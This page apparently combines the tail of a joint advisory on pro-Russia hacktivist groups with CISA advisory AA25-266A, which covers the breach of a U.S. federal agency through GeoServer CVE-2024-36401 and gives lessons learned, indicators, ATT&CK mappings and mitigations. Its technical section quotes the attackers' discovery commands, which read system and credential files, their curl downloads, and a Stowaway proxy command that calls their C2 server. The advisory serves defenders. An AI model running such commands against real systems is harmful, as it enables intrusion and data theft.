- New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
- United Kingdom organizations: Report a significant cyber security incident at report.ncsc.gov.uk (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Disclaimer

The information in this report is being provided "as is" for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document.
Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers.

Acknowledgements

Schneider Electric, Nozomi Networks, Eversource Energy, the Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory.

Version History

December 09, 2025: Initial version.

Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups

For further information on targeting methodologies for pro-Russia hacktivist groups, see:

- CISA's alert Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology;
- the joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology; and
- CISA's Russia Cyber Threat webpage.

Appendix B: Additional Designators Used for Cited Groups

The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory. Note: Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations' understanding for all activity related to these groupings.

- GRU military unit 74455: Sandworm Team, Voodoo Bear, Seashell Blizzard, APT44
- Cyber Army of Russia Reborn (CARR): CyberArmy of Russia, Народная CyberАрмия (НКА), People's CyberArmy of Russia (PCA), Russian CyberArmy Team (RCAT)
- NoName057(16): NoName057(16) Spain, NoName057(16) Italy, NoName057(16) France
- Z-Pentest: Z-Pentest Beograd, Z-Pentest Alliance, Z-Alliance

CISA Shares Lessons Learned from an Incident Response Engagement
Governance & Regulation | US-CERT Alerts | 187 days ago

Advisory at a Glance

Executive Summary

CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency's endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.

Key Actions

- Prevent compromise by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.
- Prepare for incidents by maintaining, practicing, and updating incident response plans.
- Prepare for incidents by implementing comprehensive and verbose logging and aggregating logs in a centralized out-of-band location.

Indicators of Compromise

For a downloadable copy of indicators of compromise, see: AA25-266A-JSON.stix_.json and AA25-266A-STIX.stix_.xml.

Intended Audience

Organizations: FCEB agencies and critical infrastructure organizations.
Roles: Defensive Cybersecurity Analysts, Vulnerability Analysts, Security Systems Managers, Systems Security Analysts, and Cybersecurity Policy and Planning Professionals.

Download the PDF version of this report (AA25-266A).

Introduction

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as of preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location.
CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.

CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency's endpoint detection and response (EDR) tool. CISA discovered that cyber threat actors had compromised the agency by exploiting CVE-2024-36401 in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.

Leveraging insights CISA gleaned from the organization's security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see Lessons Learned for more details):

- Vulnerabilities were not promptly remediated. The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers. The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer (June 30 to July 11, 2024) and 24 days prior to them accessing the second GeoServer (July 24, 2024).
- The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources. This delayed certain elements of CISA's response, as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.
- EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection. The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier because they did not observe an alert from a GeoServer, and the Web Server did not have endpoint protection.
These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the Mitigations section of this advisory to improve their security posture. This advisory also provides the cyber threat actors' TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see: AA25-266A-JSON.stix_.json and AA25-266A-STIX.stix_.xml.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors' activity mapped to MITRE ATT&CK tactics and techniques.

Threat Actor Activity

CISA responded to a suspected compromise of a large FCEB agency after the agency's security operations center (SOC) observed multiple endpoint security alerts. During the incident response, CISA discovered that cyber thre... 

On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living off the land (LOTL) techniques. See Figure 1 for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs. Figure 1. Overview of Threat Actor Activity Reconnaissance The cyber threat actors identified CVE-2024-36401 in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [T1595.002]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access. Resource Development The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [T1583.003]. Initial Access To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited CVE 2024-36401 [T1190]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the .js file returning 404 responses in the web logs, indicating that the server could not find the requested URL. 
Persistence The cyber threat actors primarily used web shells [T1505.003] on internet-facing hosts, along with cron jobs (scheduled commands that run automatically at specified times) [T1053.003], and valid accounts [T1078] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use. Privilege Escalation The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool [2], which can be used to exploit CVE-2016-5195 [CWE-362: “Race Condition”] [T1068]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges). Note: CVE-2016-5195 affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022. Defense Evasion To evade detection, the cyber threat actors employed indirect command execution via .php web shells and xp_cmdshell [T1202] and abused Background Intelligence Transfer Service (BITS) jobs [T1197]. CISA also observed files on GeoServer 1 named RinqQ.exe and RingQ.rar, which likely refer to a publicly available defense evasion tool called RingQ [3], that the cyber threat actors staged for potential use. Note: CISA could not recover most of the files on the host to confirm their contents. Credential Access Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [T1110] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services. Discovery After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [T1018] and downloaded the fscan tool [4] to scan the organization’s network. 
CISA identified the use of the fscan tool by analyzing evidence of its output found on disk. (Note: fscan is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using fscan and linux-exploit-suggester2.pl. CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk. GeoServer 1 The cyber threat actors leveraged CVE-2024-36401 to execute the following host discovery commands on GeoServer 1: uname-a df-h env ps -aux ipconfig [T1016] date who -b rpm -qa polkit netstat -ano [T1049] Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1: cat /etc/passwd [T1087.001] cat /etc/resolv.conf cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml cat /etc/redhat-release [T1082] cat /etc/os-release The cyber threat actors then used curl commands to download a shell script named mm.sh (which they renamed to aa.sh) and a zip file named aaa.zip to the /tmp/ directory. Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [T1046] by using the fscan tool. (Note: CISA observed endpoint logs that showed the cyber threat actors uploaded fscan to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally. The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using fscan. Their use of the -nobr and -nopoc flags for fscan indicated that this scan excluded brute forcing or vulnerability scanning, respectively. 
SQL Server CISA observed the following discovery commands on the organization’s SQL server: whoami [T1033] ipconfig /all ping -n 1 8.8.8.8 systeminfo tasklist [T1057] dir c:\ [T1083] dir c:\Users type c:\Last.txt type c:\inetpub\wwwroot type c:\inetpub\ dir c:\inetpub\wwwroot dir c:\ dir c:\ifwapps dir d:\ dir e:\ net group "domain admins" /domain type C:\Windows\System32\inetsrv\config\applicationHost.config dir c:\ifwapps\Tier1Utilities netstat -ano curl net user tasklist GeoServer 2 Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands. Lateral Movement In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling xp_cmdshell for RCE on GeoServer 1. Command and Control The cyber threat actors used PowerShell [T1059.001] and bitsadmin getfile to download payloads [T1105]. They used Stowaway [5], a publicly available multi-level proxy tool, to establish C2 [T1090]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a tomcat service account. The actors then executed Stowaway via /var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10. To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a curl command, successfully establishing an outbound connection with their C2 server using HTTP over TCP/4441. On July 14, 2024, the cyber threat actors executed /tmp/mm.sh on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. 
Additionally, they used Stowaway to establish a second C2 connection over TCP/50012, likely serving as a backup C2 channel. CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts: RingQ antivirus defense evasion tool (RingQ.exe, RingQ.rar) IOX proxy tool (iox.rar) BusyBox trojan multi-tool (busybox) WinRAR archive tool (Rar.exe) Stowaway proxy tool (agent, agent.tar, agent.zip, agentu.exe) Web shells (Handx.ashx, start_tomcat.jsp) Various shell scripts (mm.sh, t.py, t1.sh, c.bat) Detection The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a 1.txt file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred 1.txt to the SQL Server through bitsadmin after attempting other LOTL techniques, such as leveraging PowerShell and certutil. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1. Lessons Learned CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities. Vulnerabilities were not promptly remediated. The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers. The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024. The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2. 
Note: FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under Binding Operational Directive (BOD) 22-01. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.

The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources. On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion. After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment. Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently. The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis. The agency had to go through their change control board process before CISA could deploy their EDR agents. The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.

EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection. The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool. The Web Server lacked endpoint protection.

Indicators of Compromise

See Table 1 for IOCs associated with this activity.
Disclaimer: The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1. IOCs

IOC | Type | Date | Description
45.32.22[.]62 | IPv4 | Mid-July to early August 2024 | C2 Server IP Address
45.17.43[.]250 | IPv4 | Mid-July to early August 2024 | C2 Server IP Address
0777EA1D01DAD6DC261A6B602205E2C8 | MD5 | Mid-July to early August 2024 | China Chopper Web Shell
feda15d3509b210cb05eacc22485a78c | MD5 | Mid-July to early August 2024 | Generic PHP Web Shell
C9F4C41C195B25675BFA860EB9B45945 | MD5 | Mid-July to early August 2024 | Linux Exploit CVE-2016-5195
B7B3647E06F23B9E83D0B1CCE3E71642 | MD5 | Mid-July to early August 2024 | Dirtycow
64e3a3458b3286caaac821c343d4b208 | MD5 | Mid-July to early August 2024 | Stowaway Proxy Tool
20b70dac937377b6d0699a44721acd80 | MD5 | Mid-July to early August 2024 | Unknown Downloaded Executable
de778443619f37e2224898a9a800fa78 | MD5 | Mid-July to early August 2024 | Unknown Downloaded Executable

MITRE ATT&CK Tactics and Techniques

See Table 2 through Table 11 for all referenced threat actor tactics and techniques.

Table 2. Reconnaissance

Technique Title | ID | Use
Active Scanning: Vulnerability Scanning | T1595.002 | The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access.

Table 3. Resource Development

Technique Title | ID | Use
Acquire Infrastructure: Virtual Private Server | T1583.003 | The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS).

Table 4. Initial Access

Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | The cyber threat actors exploited CVE-2024-36401 on two of the organization’s public-facing GeoServers.

Table 5.
Execution

Technique Title | ID | Use
Command and Scripting Interpreter: PowerShell | T1059.001 | The cyber threat actors used PowerShell to download a payload.

Table 6. Defense Evasion

Technique Title | ID | Use
Indirect Command Execution | T1202 | The cyber threat actors employed indirect command execution via web shells.

Table 7. Persistence

Technique Title | ID | Use
BITS Jobs | T1197 | The cyber threat actors abused BITS jobs.
Scheduled Task/Job: Cron | T1053.003 | The cyber threat actors established persistence through cron jobs.
Server Software Component: Web Shell | T1505.003 | The cyber threat actors uploaded web shells for persistence.
Valid Accounts | T1078 | The cyber threat actors used valid accounts for persistence.

Table 8. Privilege Escalation

Technique Title | ID | Use
Exploitation for Privilege Escalation | T1068 | The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges.

Table 9. Credential Access

Technique Title | ID | Use
Brute Force | T1110 | The cyber threat actors used brute force techniques to obtain login credentials for web services.

Table 10. Discovery

Technique Title | ID | Use
Account Discovery: Local Account | T1087.001 | The cyber threat actors used cat /etc/passwd to discover local users.
File and Directory Discovery | T1083 | The cyber threat actors used dir c:\, dir d:\, dir e:\, and type c:\ commands to identify files and directories on the SQL server.
Network Service Discovery | T1046 | The cyber threat actors used fscan to identify SSH listeners and FTP servers.
Process Discovery | T1057 | The cyber threat actors used tasklist on the SQL server.
Remote System Discovery | T1018 | The cyber threat actors performed ping sweeps of hosts within specific subnets.
System Information Discovery | T1082 | The cyber threat actors used cat /etc/redhat-release and cat /etc/os-release commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.
System Network Configuration Discovery | T1016 | The cyber threat actors used ipconfig to check GeoServer 1’s and the SQL server’s network configurations.
System Network Connections Discovery | T1049 | The cyber threat actors executed commands such as netstat to obtain a listing of network connections to or from the systems they compromised.
System Owner/User Discovery | T1033 | The cyber threat actors used whoami on the SQL server.

Table 11. Command and Control

Technique Title | ID | Use
Ingress Tool Transfer | T1105 | The cyber threat actors used PowerShell and bitsadmin getfile to download payloads.
Proxy | T1090 | The cyber threat actors used a connection proxy to direct traffic from their C2 server.

Mitigations

CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

- Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.
  - Prioritize patching of known exploited vulnerabilities listed in the KEV catalog. CISA urges organizations to address KEV catalog vulnerabilities immediately.
  - Prioritize patching vulnerabilities in high-risk systems, including public-facing systems, as they are attractive targets for threat actors.
  - Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
  - Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).
  - Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.
  - Form a dedicated team responsible for assessing and implementing emergency patches; this team should include representatives from IT, security, and relevant business units.
- Maintain, practice, and update cybersecurity IRPs [CPG 2.S, 5.A].
  - Prepare a written IRP policy and IRP with senior leadership support. The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.
  - The IRP should identify:
    - Key personnel with knowledge of the network.
    - Key resources and courses of action (COAs) for containment and eradication in the event of compromise.
    - Procedures for granting third parties prompt access to networks and security tools. This should include processes for expediting deployment of EDR and other security tools through change control boards (CCBs).
  - The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).
  - Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises. During the test, include engagement with third party incident responders and external EDR agents and other tools. Following the test, update the IRP as necessary.
  - See CISA’s Tabletop Exercise Packages for resources designed to assist organizations with conducting their own exercises.
  - For more information on IRPs, see the National Institute of Standards and Technology’s (NIST’s) SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile.
- Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs in an out-of-band, centralized location.
  - Prepare SOCs with sufficient resources to monitor collected logs and respond to malicious cyber threat activity.
  - Consider using a SIEM solution for log aggregation and management.
- Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain). Abnormal activity to look for includes:
  - Running scans to discover other network connected devices.
  - Running commands to list, add, or alter administrator accounts.
  - Using PowerShell to download and execute remote programs.
  - Running scripts not usually seen on a network.
  - For additional information, see joint guide Identifying and Mitigating Living off the Land Techniques, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.

In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:

- Require phishing-resistant MFA for access to all privileged accounts and email services accounts [CPG 2.H].
- Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access.

Validate Security Controls

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory.
CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:

1. Select an ATT&CK technique described in this advisory (see Table 3 through Table 11).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

- Incident Response Plan (IRP) Basics
- Identifying and Mitigating Living Off the Land Techniques
- Phishing-Resistant Multi-Factor Authentication (MFA)
- Success Story: USDA’s Fast IDentity Online (FIDO) Implementation

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

Version History

September 23, 2025: Initial version.

Appendix: Key Events Timeline

Date/Time | Relevant Host | Event
July 1, 2024 | n/a | CVE-2024-36401 published.
July 11, 2024 | GeoServer 1 | Initial Access to GeoServer 1.
July 15, 2024 | n/a | CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog.
July 15, 2024 | GeoServer 1 | EDR detects Stowaway tool on GeoServer 1.
July 24, 2024 | GeoServer 2 | Initial Access to GeoServer 2.
July 31, 2024 | Web Server | Initial Access to Web Server.
July 31, 2024 | SQL Server | Initial Access to SQL Server.
Aug. 1, 2024 | SQL Server, GeoServer 1 | Organization observes SQL Alert and contains SQL Server and GeoServer 1.
Aug. 1, 2024 | n/a | The impacted organization requested assistance from CISA.
Aug. 5, 2024 | n/a | CISA began forensic artifact analysis.
Aug. 6, 2024 | GeoServer 2 | Last observed threat actors’ activity: discovery commands on GeoServer 2.
Aug. 8 – Sept. 3, 2024 | n/a | CISA conducted their full incident response.

Notes

[1] “GeoServer/GeoServer,” GitHub, published July 1, 2024, https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w.
[2] “firefart/dirtycow,” GitHub, last modified 2021, https://github.com/firefart/dirtycow.
[3] “T4y1oR/RingQ,” GitHub, last modified February 19, 2025, https://github.com/T4y1oR/RingQ.
[4] “shadow1ng/fscan,” GitHub, last modified July 2025, https://github.com/shadow1ng/fscan.
[5] “ph4ntonn/Stowaway,” GitHub, last modified April 2025, https://github.com/ph4ntonn/Stowaway.